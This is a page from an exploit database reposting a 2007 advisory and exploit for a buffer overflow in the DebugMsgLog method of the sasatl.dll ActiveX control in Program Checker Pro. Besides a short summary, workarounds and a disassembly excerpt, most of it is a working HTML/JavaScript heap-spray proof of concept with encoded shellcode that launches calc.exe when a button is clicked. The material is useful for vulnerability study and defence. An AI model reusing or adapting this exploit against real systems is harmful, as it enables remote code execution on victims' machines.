0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit
[========================================================================
Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit
========================================================================
:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit
=============================================================================
Internal ID: VULWAR200707121.
Introduction
------------
sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com
Tested In
---------
- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0
Summary
-------
The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries.
Impact
------
An attacker could execute arbitrary code into the remote machine.
Workaround
----------
- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51.
- Unregister sasatl.dll using regsvr32.
Timeline
--------
July 12 2007 -- Exploit published.
Credits
-------
* Vulnerability Discovered by Will Dormann CERT/CC.
* Exploit by callAX <callAX@shellcode.com.ar> from GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
-----------------
.text:100340F3 sub_100340F3 proc near ; DATA XREF: .rdata:100ACA6Co
.text:100340F3 ; .rdata:100AFC1Cto
.text:100340F3 mov eax, offset sub_1009D47C
.text:100340F8 call __EH_prolog
.text:100340FD push dword ptr [ebp+0Ch] ; wchar_t *
.text:10034100 lea ecx, [ebp+0Ch]
.text:10034103 call sub_1005DC32
.text:10034108 push dword ptr [ebp+0Ch] ; char
.text:1003410B and dword ptr [ebp-4], 0
.text:1003410F push offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s"
.text:10034114 push 1 ; int
.text:10034116 call sub_10003099
.text:1003411B or dword ptr [ebp-4], 0FFFFFFFFh
.text:1003411F add esp, 0Ch
.text:10034122 lea ecx, [ebp+0Ch]
.text:10034125 call sub_1005DB6B
.text:1003412A mov ecx, [ebp-0Ch]
.text:1003412D xor eax, eax
.text:1003412F mov large fs:0, ecx
.text:10034136 leave
.text:10034137 retn 8
Proof of Concept
----------------
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<h4>Will Dormann from CERT/CC is credited with the discovery.</H4><br>
<h4>This exploits executes calc.exe</h4>
<SCRIPT>
var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 2272;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.DebugMsgLog(x);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x400000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (payLoadCode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Launch Exploit">
</BODY>
</HTML>
# 0day.today [2024-11-15] #